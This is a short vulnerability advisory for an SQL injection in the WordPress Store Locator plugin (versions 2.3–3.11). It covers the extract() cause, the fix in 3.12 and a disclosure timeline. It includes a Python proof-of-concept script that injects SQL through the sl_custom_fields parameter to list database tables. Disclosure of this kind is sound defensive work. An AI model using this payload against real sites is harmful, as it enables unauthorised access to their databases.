WordPress Store Locator 2.3 - 3.11, SQL Injection

Due to passing the $_GET variable scope into the extract function, an anonymous user can craft a request that will allow them to inject arbitrary SQL into the query which is later built from variables within the script. The output from this query is then returned as XML.



CVSS Score


CSSS Vector


Attack Scope


Authorization Required



Update to version 3.12

Proof of Concept

On a default installation, the following script when executed will return an XML document, containing a list of tables from the information_schema database. Note, that in this example the attacker must know the name of the Store Locator table. It may be possible to perform this attack without knowing the prefix for the WordPress table names.

import requests
url = "http://localhost/wp-content/plugins/store-locator/sl-xml.php"
payload = {
	"sl_custom_fields":", information_schema.tables.table_name as sqli FROM wp_store_locator LEFT JOIN information_schema.tables ON 1=1--",
r = requests.get(url,params=payload)
print r.text


  • 2014-10-27: Discovered
  • 2014-10-27: Vendor notified
  • 2014-10-27: Vendor responded with intent to fix
  • 2014-10-29: Version 3.12 released – issue resolved
  • 2014-11-03: CVE requested
  • 2014-11-05: CVE assigned
  • 2014-11-05: Advisory released